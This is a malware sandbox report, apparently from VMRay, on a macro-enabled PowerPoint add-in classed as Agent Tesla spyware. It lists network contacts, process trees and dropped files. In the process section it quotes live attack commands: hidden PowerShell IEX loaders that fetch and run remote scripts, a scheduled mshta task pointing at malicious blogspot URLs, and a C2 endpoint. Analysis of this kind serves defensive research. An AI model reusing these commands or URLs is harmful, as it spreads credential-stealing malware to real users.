classifications: injector downloader spyware malicious

DYNAMIC ANALYSIS REPORT#2111629

MALICIOUS

Classifications: Injector Downloader Spyware

Threat Names: Agent Tesla v3 Mal/HTMLGen-A VB:Trojan.Valyria.4205

Verdict Reason: -

Sample Type Powerpoint Document

File Name 9_pdf.ppam

ID #838001

MD5 8338e340a6e070805616aee57601706d

SHA1 b47fb0ae8bdf11a58ebcebb514dfd3c8fd4b7826

SHA256 8e59758c7dba0ca744790644a23fa08c1e416e8f38ee221868b6560a2c915b51

File Size 8.80 KB

Report Created 2021-08-09 15:13 (UTC+2)

Target Environment win7_64_sp1_en_mso2016 | ms_office

X-Ray Vision for Malware - www.vmray.com 1 / 60


OVERVIEW

VMRay Threat Identifiers (26 rules, 52 matches)

Score Category Operation Count Classification

5/5 System Modification Modifies operating system directory 1 -

(Process #14) aspnet_compiler.exe creates file "C:\Windows\system32\drivers\etc\hosts" in the OS directory.•

5/5 YARA Malicious content matched by YARA rules 1 Spyware

Rule "AgentTesla_StringDecryption_v3" from ruleset "Malware" has matched on a memory dump for (process #14) aspnet_compiler.exe.•

4/5 Obfuscation Reads from memory of another process 3 -

(Process #6) powershell.exe reads from (process #14) aspnet_compiler.exe.



•

•

•

4/5 Antivirus Malicious content was detected by heuristic scan 3 -

Built-in AV detected a downloaded file as "VBS.Heur.Asthma.1.82A465E6.Gen".

Built-in AV detected a downloaded file as "VB:Trojan.Valyria.4205".

Built-in AV detected "VBS.Heur.Asthma.1.82A465E6.Gen" in the PCAP of the analysis.

•

•

•

4/5 Injection Writes into the memory of another process 2 Injector

(Process #6) powershell.exe modifies memory of (process #14) aspnet_compiler.exe.

(Process #6) powershell.exe modifies memory of (process #16) aspnet_compiler.exe.

•

•

4/5 Injection Modifies control flow of another process 2 -

(Process #6) powershell.exe alters context of (process #14) aspnet_compiler.exe.

(Process #6) powershell.exe alters context of (process #16) aspnet_compiler.exe.

•

•

4/5 Execution Document tries to create process 1 -

Document creates (process #3) mshta.exe.•

4/5 Reputation Contacts known malicious URL 4 -

Reputation analysis labels the contacted URL "http://bukbukbukak.blogspot.com/p/9.html" as "Mal/HTMLGen-A".

Reputation analysis labels the URL "http://1230948%[email protected]/p/9.html" which was contacted by (process #13) mshta.exe as "Mal/HTMLGen-A".

Reputation analysis labels the URL "https://bukbukbukak.blogspot.com/p/9.html" which was contacted by (process #13) mshta.exe as "Mal/HTMLGen-A".

Reputation analysis labels the contacted URL "https://bukbukbukak.blogspot.com/js/cookienotice.js" as "Mal/HTMLGen-A".

•

•

•

•

4/5 Reputation Resolves known malicious domain 1 -

Reputation analysis labels the resolved domain "bukbukbukak.blogspot.com" as "Mal/HTMLGen-A".•

4/5 Task Scheduling Schedules task 1 -

Schedules task for command "MsHtA", to be triggered by Time. Task has been rescheduled by the analyzer.•

4/5 Task Scheduling Schedules task via schtasks 2 -

Schedules task """BlueStacksIUptad""" via the schtasks command line utility.

Schedules task "BlueStacksIUptad" via the schtasks command line utility.

•

•




4/5 Network Connection Performs DNS request 4 -

(Process #6) powershell.exe resolves host name "92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com" to IP "34.102.176.152".

(Process #6) powershell.exe resolves host name "35d42729-3b2d-44cd-88c7-59a76492301c.usrfiles.com" to IP "34.102.176.152".

(Process #10) powershell.exe resolves host name "35d42729-3b2d-44cd-88c7-59a76492301c.usrfiles.com" to IP "34.102.176.152".

(Process #10) powershell.exe resolves host name "www.google.com" to IP "172.217.23.100".

•

•

•

•

4/5 Network Connection Connects to remote host 4 -

(Process #6) powershell.exe opens an outgoing TCP connection to host "34.102.176.152:443".



(Process #14) aspnet_compiler.exe opens an outgoing TCP connection to host "180.214.239.67:80".

•

•

•

•

4/5 Network Connection Downloads file 1 Downloader

Downloads file via http from http://pki.goog/gsr1/gsr1.crt.•

4/5 Network Connection Attempts to connect through HTTP 4 -

(Process #10) powershell.exe connects to "http://www.google.com/".

(Process #10) powershell.exe failed to connect to "http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRecgPDGLadxIgGIhCsvzDNI0n-EbyITWaDWe2KMgFy".

(Process #14) aspnet_compiler.exe connects to "http://180.214.239.67/k/p9i/inc/b61f0c2fdfd137.php".

(Process #13) mshta.exe failed to connect to "http://1230948%[email protected]/p/9.html".

•

•

•

•

4/5 Network Connection Attempts to connect through HTTPS 8 -

(Process #3) mshta.exe connects to "https://fckusecurityresearchermotherfkrs.blogspot.com/p/9_17.html".

(Process #3) mshta.exe connects to "https://www.bitly.com/ddwddwwkfwdwoooi".

(Process #3) mshta.exe connects to "https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Ffckusecurityresearchermotherfkrs.blogspot.com%2Fp%2F9_17.html&type=blog&bpli=1".

(Process #6) powershell.exe connects to "https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_38b5f8d731e148338a8c245338c3ed54.txt".

(Process #6) powershell.exe connects to "https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_75b3013f776c45d9b3d3d4d971e7234d.txt".

(Process #10) powershell.exe connects to "https://35d42729-3b2d-44cd-88c7-59a76492301c.usrfiles.com/ugd/35d427_aba34aefaf6944578eaddcbf518b0d51.txt".

(Process #13) mshta.exe connects to "https://accounts.google.com/ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotUR... ...//www.blogger.com/blogin.g?blogspotURL%3Dhttps://bukbukbukak.blogspot.com/p/9.html%26type%3Dblog%26bpli%3D1&passive=true&go=true".

(Process #13) mshta.exe connects to "https://bukbukbukak.blogspot.com/p/9.html".

•

•

•

•

•

•

•

•

3/5 Discovery Enumerates running processes 1 -

(Process #6) powershell.exe enumerates running processes.•

3/5 Persistence Installs system startup script or application 1 -

(Process #10) powershell.exe adds "c:\users\keecfmwgj\appdata\roaming\microsoft\windows\start menu\programs\startup\onedrive.vbs" to Windows startup folder.•

2/5 Hide Tracks Writes an unusually large amount of data to the registry 1 -

(Process #13) mshta.exe hides 37094 bytes in "HKEY_CURRENT_USER\Software\cookerr".•

2/5 Discovery Reads network adapter information 1 -

(Process #14) aspnet_compiler.exe reads the network adapters' addresses by API.•

2/5 Execution Office macro uses an execute function 1 -

Office macro uses the shellexecute function.•

2/5 Execution Executes macro on specific event 1 -




Executes macro automatically on target "document" and event "open".•

2/5 Execution Creates suspicious COM object 1 -

Office macro creates suspicious Shell.Application COM object.•

2/5 Obfuscation Document contains obfuscated macros 1 -

C:\Users\kEecfMwgj\Desktop\9_pdf.ppam contains an obfuscated macro.•

2/5 Defense Evasion URL contains unusual backslashes 1 -

Extracted URL http://1230948%[email protected]/p/9.html\ does not use the standard URL syntax.•

1/5 Execution Contains suspicious Office macro 1 -

Office document contains a suspicious VBA macro.•

- Trusted Known clean file 2 -

A file which was only downloaded to memory is a known clean file.

File "C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RIJUQL1C\error[1]" is a known clean file.

•

•

- Trusted File has embedded known clean URL 1 -

Extracted URL "https://translate.google.de/?hl=de&tab=jT" is a known clean URL.•



Mitre ATT&CK Matrix

Initial Access Execution PersistencePrivilege

EscalationDefenseEvasion

CredentialAccess

DiscoveryLateral

MovementCollection

Commandand Control

Exfiltration Impact

#T1064Scripting

#T1060Registry RunKeys / Startup

Folder

#T1053Scheduled

Task

#T1112 ModifyRegistry

#T1057Process

Discovery

#T1105Remote File

Copy

#T1071Standard

ApplicationLayer Protocol

#T1053Scheduled

Task

#T1053Scheduled

Task

#T1064Scripting

#T1016SystemNetwork

ConfigurationDiscovery

#T1105Remote File

Copy

#T1032Standard

CryptographicProtocol



Sample Information

Analysis Information

ID #838001

MD5 8338e340a6e070805616aee57601706d

SHA1 b47fb0ae8bdf11a58ebcebb514dfd3c8fd4b7826

SHA256 8e59758c7dba0ca744790644a23fa08c1e416e8f38ee221868b6560a2c915b51

SSDeep 192:37Xq/ea9PRww1JU7YnRS3yLbKR8KbwJgnUY2:30eakIU0nRdnKbfUY2

File Name 9_pdf.ppam

File Size 8.80 KB

Sample Type Powerpoint Document

Has Macros

Creation Time 2021-08-09 15:13 (UTC+2)

Analysis Duration 00:04:05

Termination Reason Timeout

Number of Monitored Processes 20

Execution Successful False

Reputation Enabled

WHOIS Enabled

Built-in AV Enabled

Built-in AV Applied On Sample Files, PCAP File, Downloaded Files, Dropped Files, Modified Files, Memory Dumps, Embedded Files

Number of AV Matches 1

YARA Enabled

YARA Applied On Sample Files, PCAP File, Downloaded Files, Dropped Files, Modified Files, Memory Dumps, Embedded Files

Number of YARA Matches 1



Screenshots truncated



NETWORK

General

DNS

HTTP/S

HTTP Requests

Method URL Dest. IP Dest. Port Status Code Response Size Verdict

32.23 KB total sent

2018.46 KB total received

2 ports 80, 443

11 contacted IP addresses

74 URLs extracted

31 files downloaded

0 malicious hosts detected

10 DNS requests for 8 domains

1 nameservers contacted

0 total requests returned errors

19 URLs contacted, 9 servers

14 sessions, 32.23 KB sent, 2018.46 KB received

http://1230948%[email protected]/p/9.html\

- - 0 bytes NA

http://1230948%[email protected]/p/9.html

- - 0 bytes NA

GET http://bitly.com/ddwddwwkfwdwoooi - - 0 bytes NA

GET http://pki.goog/gsr1/gsr1.crt - - 0 bytes NA

GET http://bukbukbukak.blogspot.com/p/9.html - - 0 bytes NA

GET http://www.google.com/ - - 0 bytes NA

GEThttp://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRecgPDGLadxIgGIhCsvzDNI0n-EbyITWaDWe2KMgFy

- - 0 bytes NA

POST http://180.214.239.67/k/p9i/inc/b61f0c2fdfd137.php - - 0 bytes NA

GET //www.google.com/policies/terms/ - - 0 bytes NA

GET //support.google.com/websearch/answer/86640 - - 0 bytes NA

https://www.bitly.com/ddwddwwkfwdwoooi - - 0 bytes NA

https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_38b5f8d731e148338a8c245338c3ed54.txt

- - 0 bytes NA

https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_75b3013f776c45d9b3d3d4d971e7234d.txt

- - 0 bytes NA

https://35d42729-3b2d-44cd-88c7-59a76492301c.usrfiles.com/ugd/35d427_aba34aefaf6944578eaddcbf518b0d51.txt

- - 0 bytes NA

https://35d42729-3b2d-44cd-88c7-59a76492301c.usrfiles.com/ugd/35d427_02df7f9ae2d74130872a6c4165f7ed60.txt

- - 0 bytes NA




GEThttps://fckusecurityresearchermotherfkrs.blogspot.com/p/9_17.html

- - 0 bytes NA

GEThttps://fckusecurityresearchermotherfkrs.blogspot.com/js/cookienotice.js

- - 0 bytes NA

GET

https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Ffckusecurityresearchermotherfkrs.blogspot.com%2Fp%2F9_17.html&type=blog&bpli=1

- - 0 bytes NA

GET https://fonts.googleapis.com/css?family=Open+Sans:300 - - 0 bytes NA

GEThttps://fonts.googleapis.com/css?lang=de&family=Product+Sans|Roboto:400,700

- - 0 bytes NA

GET

https://accounts.google.com/ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://bukbukbukak.blogspot.com/... ...s://www.blogger.com/blogin.g?blogspotURL%3Dhttps://bukbukbukak.blogspot.com/p/9.html%26type%3Dblog%26bpli%3D1&passive=true&go=true

- - 0 bytes NA

GET https://bukbukbukak.blogspot.com/p/9.html - - 0 bytes NA

GET https://bukbukbukak.blogspot.com/js/cookienotice.js - - 0 bytes NA

GET https://www.google.com/recaptcha/api.js - - 0 bytes NA

GEThttps://www.blogger.com/static/v1/widgets/3822632116-css_bundle_v2.css

- - 0 bytes NA

GEThttps://fckusecurityresearchermotherfkrs.blogspot.com/favicon.ico

- - 0 bytes NA

GEThttps://www.blogger.com/dyn-css/authorization.css?targetBlogID=644545533916229546&zx=551455ad-7f93-402f-89a1-d9e43c6794f5

- - 0 bytes NA

GET https://fckusecurityresearchermotherfkrs.blogspot.com/ - - 0 bytes NA

GEThttps://www.blogger.com/blogin.g?blogspotURL=https://fckusecurityresearchermotherfkrs.blogspot.com/p/9_17.html&type=blog

- - 0 bytes NA

GEThttps://www.blogger.com/static/v1/widgets/2583860411-widgets.js

- - 0 bytes NA

GET

https://www.blogger.com/age-verification.g?blogspotURL=https://fckusecurityresearchermotherfkrs.blogspot.com/p/9_17.html&from=APq4FmCi5NBs1f3axOfaSfoosWI5gDvOWPuVdwMn7HZMV1Hu00EksHZcLZ8-Uz03byZEC6CvHoy-fLnoyhgJ3-myRV-oRFV6mg

- - 0 bytes NA

GET https://www.blogger.com - - 0 bytes NA

GEThttps://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fbukbukbukak.blogspot.com%2Fp%2F9.html&type=blog&bpli=1

- - 0 bytes NA

GEThttps://www.blogger.com/static/v1/v-css/281434096-static_pages.css

- - 0 bytes NA

GET https://www.google.de/intl/de/about/products?tab=jh - - 0 bytes NA

GEThttps://myaccount.google.com/?utm_source=OGB&tab=jk&utm_medium=app

- - 0 bytes NA

GET https://www.google.de/webhp?tab=jw - - 0 bytes NA

GET https://maps.google.de/maps?hl=de&tab=jl - - 0 bytes NA

GET https://www.youtube.com/?gl=DE&tab=j1 - - 0 bytes NA

GET https://play.google.com/?hl=de&tab=j8 - - 0 bytes NA

GET https://news.google.com/?tab=jn - - 0 bytes NA

GET https://mail.google.com/mail/?tab=jm - - 0 bytes NA




GET https://meet.google.com/?hs=197 - - 0 bytes NA

GET https://chat.google.com/ - - 0 bytes NA

GET https://contacts.google.com/?hl=de&tab=jC - - 0 bytes NA

GET https://drive.google.com/?tab=jo - - 0 bytes NA

GET https://calendar.google.com/calendar?tab=jc - - 0 bytes NA

GET https://translate.google.de/?hl=de&tab=jT - - 0 bytes NA

GET https://photos.google.com/?tab=jq&pageId=none - - 0 bytes NA

GET https://duo.google.com/?usp=duo_ald - - 0 bytes NA

GET

https://www.google.com/chrome/?brand=CHZO&utm_source=google.com&utm_medium=desktop-app-launcher&utm_campaign=desktop-app-launcher&utm_content=chrome-logo&utm_keyword=CHZO

- - 0 bytes NA

GET https://www.google.de/shopping?hl=de&source=og&tab=jf - - 0 bytes NA

GET https://docs.google.com/document/?usp=docs_alc - - 0 bytes NA

GET https://docs.google.com/spreadsheets/?usp=sheets_alc - - 0 bytes NA

GET https://docs.google.com/presentation/?usp=slides_alc - - 0 bytes NA

GET https://books.google.de/?hl=de&tab=jp - - 0 bytes NA

GET https://www.blogger.com/?tab=jj - - 0 bytes NA

GET https://hangouts.google.com/ - - 0 bytes NA

GET https://keep.google.com/ - - 0 bytes NA

GET https://jamboard.google.com/?usp=jam_ald - - 0 bytes NA

GET https://earth.google.com/web/ - - 0 bytes NA

GET https://www.google.de/save - - 0 bytes NA

GEThttps://artsandculture.google.com/?hl=de&utm_source=ogs.google.com&utm_medium=referral

- - 0 bytes NA

GEThttps://ads.google.com/home/?subid=ww-ww-et-g-aw-a-vasquette_ads_cons_1!o2

- - 0 bytes NA

GET https://podcasts.google.com/ - - 0 bytes NA

GET https://stadia.google.com/ - - 0 bytes NA

GET https://www.google.com/travel/?dest_src=al - - 0 bytes NA

GET https://docs.google.com/forms/?usp=forms_alc - - 0 bytes NA

GEThttps://accounts.google.com/ServiceLogin?service=blogger&continue=https://www.blogger.com/blogger.g&ec=GAZAHg

- - 0 bytes NA

GET https://www.blogger.com/go/helpcenter - - 0 bytes NA

GET https://www.blogger.com/go/discuss - - 0 bytes NA

GET https://www.blogger.com/go/tutorials - - 0 bytes NA

GET https://www.blogger.com/go/buzz - - 0 bytes NA

GET https://www.blogger.com/go/devapi - - 0 bytes NA

GET https://www.blogger.com/go/devforum - - 0 bytes NA

GET https://www.blogger.com/go/terms - - 0 bytes NA




DNS Requests

Type Hostname Response Code Resolved IPs CNames Verdict

GET https://www.blogger.com/go/privacy - - 0 bytes NA

GET https://www.blogger.com/go/contentpolicy - - 0 bytes NA

GET https://www.google.de/contact/impressum.html - - 0 bytes NA

GET https://www.google-analytics.com/analytics.js - - 0 bytes NA

GEThttps://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.js

- - 0 bytes NA

GET https://bukbukbukak.blogspot.com/favicon.ico - - 0 bytes NA

GEThttps://www.blogger.com/dyn-css/authorization.css?targetBlogID=3230375044160936909&zx=74bb4738-53be-4905-9fa3-25325b11a73a

- - 0 bytes NA

GET https://bukbukbukak.blogspot.com/ - - 0 bytes NA

GEThttps://www.blogger.com/blogin.g?blogspotURL=https://bukbukbukak.blogspot.com/p/9.html&type=blog

- - 0 bytes NA

A www.bitly.com, bitly.com NoError67.199.248.14,67.199.248.15

bitly.com NA

Afckusecurityresearchermotherfkrs.blogspot.com,blogspot.l.googleusercontent.com

NoError 216.58.212.161blogspot.l.googleusercontent.com

NA

A pki.goog NoError 216.239.32.29 NA

A fonts.googleapis.com NoError 142.250.74.202 NA

A92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com,media-router.wixstatic.com, gcp.media-router.wixstatic.com

NoError 34.102.176.152media-router.wixstatic.com,gcp.media-router.wixstatic.com

NA

A35d42729-3b2d-44cd-88c7-59a76492301c.usrfiles.com,media-router.wixstatic.com, gcp.media-router.wixstatic.com

NoError 34.102.176.152media-router.wixstatic.com,gcp.media-router.wixstatic.com

NA

Abukbukbukak.blogspot.com,blogspot.l.googleusercontent.com

NoError 216.58.212.161blogspot.l.googleusercontent.com

NA

- 35d42729-3b2d-44cd-88c7-59a76492301c.usrfiles.com - 34.102.176.152 NA

- www.google.com - 172.217.23.100 NA



BEHAVIOR

Process Graph

Sample Start#1

powerpnt.exe#2

outlook.exeRPC Server #3

mshta.exeChild Process

#4svchost.exe

RPC Server

#5powershell.exe

Child Process

#6powershell.exe

Child Process

#10powershell.exe

Child Process

#7wmiprvse.exe

RPC Server

#12taskeng.exe

Child Process

#11schtasks.exeChild Process

#14aspnet_compiler.exe

Modify Memory

Modify Control Flow

Child Process


Child Process


Modify Memory

Modify Control Flow

Child Process

#21powershell.exe

Child Process

#18wscript.exe

Child Process

#22wscript.exe

Child Process

#13mshta.exe

Child Process

#19powershell.exe

Child Process #20schtasks.exe

Child Process

#23powershell.exe

Child Process



Process #1: powerpnt.exe

ID 1

File Name c:\program files (x86)\microsoft office\root\office16\powerpnt.exe

Command Line "C:\Program Files (x86)\Microsoft Office\Root\Office16\POWERPNT.EXE"

Initial Working Directory C:\Users\kEecfMwgj\Desktop\

Monitor Start Time Start Time: 33976, Reason: Analysis Target

Unmonitor End Time End Time: 279253, Reason: Terminated by Timeout

Monitor duration 245.28s

Return Code Unknown

PID 3344

Parent PID 1124

Bitness 32 Bit



Process #2: outlook.exe

ID 2

File Name c:\program files (x86)\microsoft office\root\office16\outlook.exe

Command Line "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" -Embedding

Initial Working Directory C:\Windows\system32\

Monitor Start Time Start Time: 51813, Reason: RPC Server

Unmonitor End Time End Time: 105867, Reason: Terminated


Return Code 0

PID 3616

Parent PID 584

Bitness 32 Bit



Process #3: mshta.exe

Dropped Files (25)

File Name File Size SHA256 YARA Match

ID 3

File Name c:\windows\syswow64\mshta.exe

Command Line C:\Windows\SysWOW64\mshta.exe https://www.bitly.com/ddwddwwkfwdwoooi


Monitor Start Time Start Time: 85089, Reason: Child Process



Return Code 0

PID 3720

Parent PID 3616

Bitness 32 Bit

C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\X9OHK109\mem5YaGs126MiZpBA-UN_r8OUuht[1].eot

15.60 KB01e698231e9d93dceaa9a97f4e5cdbdbceefbea67d4e39acd0391e1cae00889b

C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternetFiles\Content.IE5\MM5O9XQS\kJEjBvgX7BgnkSrUwT8UnLVc38YydejYY-oE_LvN[1].eot

152.93 KB22f8356c61b22b8a6506465087d48d831303e10c66bd3ced965f6a32a7302dde

C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternetFiles\Content.IE5\PMMR5K9K\pxiDypQkot1TnFhsFMOfGShVF9eK[1].eot

27.95 KBf0da44c78fae13b0c7078626f17f4b5b60ef9e396d6cfc5cec5304d17c358d1a

C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternetFiles\Content.IE5\RIJUQL1C\KFOmCnqEu92Fr1Mu4mxO[1].eot

17.40 KBbe869a73a160440e8bfc5c7d84a907febd61075d920d51c7d0097d7295c865cd

- 32.91 KBdc82cadcaad72e4f7aa996a149126ecb15e652606e55a12efcb994a16f5159a9

C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\X9OHK109\cookienotice[1].js

6.36 KB068ffe90977f2b5b2dc2ef18572166e85281bd0ecb31c4902464b23db54d2568

C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\MM5O9XQS\3822632116-css_bundle_v2[1].css

36.12 KB224d95cce08108610c46ef4134793dbdd619e43e90e9d9cf42716a08f45222f9

C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\PMMR5K9K\3046902713-ieretrofit[1].js

26.01 KB5993c37fe8dfca6e242e6e5b7c48ae99c9d41a8fe3d209dd38a0d161516b519a

C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\X9OHK109\2583860411-widgets[1].js

147.02 KB9d358297f944faf6cfd24e3069ef42fa2aaef6fe243b61389a9a02c8d6de9a50

- 149.99 KB25a34aed1f1f78b098376e9e7b6785fa7eaf3d9281192ff5e3915e6083ec8450

C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\MM5O9XQS\3101730221-analytics_autotrack[1].js

24.70 KB21cc4dc6c3c01b84c808004173f42e3ed1b4f09551a10d69b4cec7394a1590e6

C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\X9OHK109\authorization[1].css

1 bytes01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b

C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\RIJUQL1C\281434096-static_pages[1].css

3.72 KB0fc52ef116f03fd95f9857856f1e2cbdfa2cacc398e066db0d8d5481739bc2d7

- 1.13 KBcbad27c35fbc84e2da4280476adeb197566db2750b8b4a79eb7e872db8d8acb7

C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\PMMR5K9K\css[1].txt

172 bytes3e6e1c58507746b01dd0f74cd9d40c885ffaea0cc025eb4f27c4c947916f2068

C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\RIJUQL1C\css[1].txt

402 bytes49d0d1473181447caad524188bfcb1344b20a4ffa42bb0b5ff7695e379ae3b79




Host Behavior

Type Count

Network Behavior

Type Count

C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\MM5O9XQS\maia[1].css

42.48 KB8684a32d1a10d050a26fc33192edf427a5f0c6874c590a68d77ae6e0d186bd8a

C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\RIJUQL1C\analytics[1].js

48.23 KBe61660c659c426e45bce2937dddb01af6b550502a2904546575c1ec2ba1121dd

- 95 bytes0fdcb4746995f0d5240e5ec11370cb950722a894f3cff4118aa68ccc92010edd

- 403 bytesecb30886406e3f776ff7bc3834de849944471e626ff148bed2fa389d02866044

C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\RIJUQL1C\error[1]

3.17 KB7990e703ae060c241eba6257d963af2ecf9c6f3fbdb57264c1d48dda8171e754

- 97 bytes0b113b5594ea4cfeb6346d6f997c2dd8a1623037a855b9f896093ec1e1426811

- 195 bytesbf0a747e7005ace88140897c4c166749eaffcd9f96286c431fa3409709a0b344

C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\PMMR5K9K\error[1]

4.12 KB966240c0527b20e8e2553b7e5a68594ae69230aa00186f2c6c2c342405494837

C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\PMMR5K9K\warning[1]

1.04 KB5f95eff2bcaaea82d0ae34a007de3595c0d830ac4810ea4854e6526e261108e9

System 312

Module 190

File 122

Environment 2

Registry 184

- 5

Keyboard 2

Mutex 1

Window 24

COM 66

- 2

Process 1

HTTPS 3

TCP 4



Process #4: svchost.exe

ID 4

File Name c:\windows\system32\svchost.exe

Command Line C:\Windows\system32\svchost.exe -k netsvcs





Return Code Unknown

PID 816

Parent PID 464

Bitness 64 Bit



Process #5: powershell.exe

Host Behavior

Type Count

ID 5

File Name c:\windows\syswow64\windowspowershell\v1.0\powershell.exe

Command Line"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /create /sc MINUTE /mo 80 /tn ""BlueStacksIUptad"" /F /tr ""\""MsHtA http://1230948%[email protected]/p/9.html\""





Return Code 0

PID 3808

Parent PID 3720

Bitness 32 Bit

System 4

Module 3

File 23

Environment 14

Registry 2

Process 1

- 13




Host Behavior

Type Count

Network Behavior

Type Count

ID 6


Command Line"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Cre... ...-904d-daf4679f14d5.usrfiles.com/ugd/92c492_75b3013f776c45d9b3d3d4d971e7234d.txt').GetResponse().GetResponseStream()).ReadToend());





Return Code 0

PID 3828

Parent PID 3720

Bitness 32 Bit

System 38

Module 12

File 535

Environment 38

Registry 94

Process 6

- 38

- 7

- 16

HTTPS 2

DNS 2

TCP 1



Process #7: wmiprvse.exe

ID 7

File Name c:\windows\system32\wbem\wmiprvse.exe

Command Line C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding





Return Code Unknown

PID 2812

Parent PID 584

Bitness 64 Bit




Dropped Files (7)


Host Behavior

Type Count

Network Behavior

Type Count

ID 10


Command Line"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $NOTHING = '(Nè`<^_^>t`.Wè'.Replace('<^_^>','w-Object Ne');$alosh='b... ...9a76492301c.usrfiles.com/ugd/35d427_aba34aefaf6944578eaddcbf518b0d51.txt'')';$YOUTUBE=IÈ`X ($NOTHING,$alosh,$Dont -Join '')|IÈ`X





Return Code 0

PID 3928

Parent PID 3720

Bitness 32 Bit

C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

8.99 KB1adc32fffc15aee5a186eb7a6fd12a09c377c83665289589c94058df73a9de19

C:\Users\kEecfMwgj\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\OneDrive.vbs

398 bytes61e40c1da7fd6964108819d35ac2641ec11f80d18f81b3fdc361612e6060bf8c

C:\Users\Public\alosh.ps1 12.46 KB049d229c448e844e1e6d7e30478d986f549c05471764db32ee349f494c3e1314

C:\Users\Public\run.ps1 559 bytes76e20cb044db745f7065bff4d5bb09c16d83ca1d17f615fa2e41e1d68f1cde17

C:\Users\Public\test.ps1 374 bytes7993a1c616e7d70074f3508ee8fb3d5b709f2a6894cd5a3fceff1630503a6513

C:\Users\Public\vb.vbs 495 bytes03b7e264915f482ca3499e842e8e71a2186c67f067adbd222059302da7b320f7

C:\Users\Public\Chrome.vbs 236 bytesfebb4719018181cf1dc5ed66812439e8c0a8b982a18c2e77354986804b71c1fa

System 71

Module 13

File 3092

Environment 161

Registry 136

- 58

Process 2

Keyboard 1

HTTP 2

HTTPS 1

DNS 3



Type Count

TCP 2



Process #11: schtasks.exe

Host Behavior

Type Count

ID 11

File Name c:\windows\syswow64\schtasks.exe

Command Line"C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 80 /tn BlueStacksIUptad /F /tr "MsHtA http://1230948%[email protected]/p/9.html"





Return Code 0

PID 3284

Parent PID 3808

Bitness 32 Bit

System 5

Module 9

COM 1

User 1

File 5



Process #12: taskeng.exe

ID 12

File Name c:\windows\system32\taskeng.exe

Command Line taskeng.exe {4AF814F3-B5F2-456B-9FF3-B4FF2E8485C0} S-1-5-21-4219442223-4223814209-3835049652-1000:Q9IATRKPRH\kEecfMwgj:Interactive:LUA[1]





Return Code Unknown

PID 2808

Parent PID 816

Bitness 64 Bit



Process #13: mshta.exe

Dropped Files (7)


Host Behavior

Type Count

ID 13

File Name c:\windows\system32\mshta.exe

Command Line C:\Windows\system32\MsHtA.EXE http://1230948%[email protected]/p/9.html





Return Code Unknown

PID 3232

Parent PID 2808

Bitness 64 Bit

C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\MM5O9XQS\cookienotice[1].js

6.36 KB068ffe90977f2b5b2dc2ef18572166e85281bd0ecb31c4902464b23db54d2568

C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\PMMR5K9K\3822632116-css_bundle_v2[1].css

36.12 KB224d95cce08108610c46ef4134793dbdd619e43e90e9d9cf42716a08f45222f9

C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\MM5O9XQS\authorization[1].css

1 bytes01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b

- 95 bytes0fdcb4746995f0d5240e5ec11370cb950722a894f3cff4118aa68ccc92010edd

- 403 bytesecb30886406e3f776ff7bc3834de849944471e626ff148bed2fa389d02866044

- 86.98 KB329199d138adcc51a8bd2e72401c2e64be9a1e8f3009dc2dc3774ac9deb5f1b7

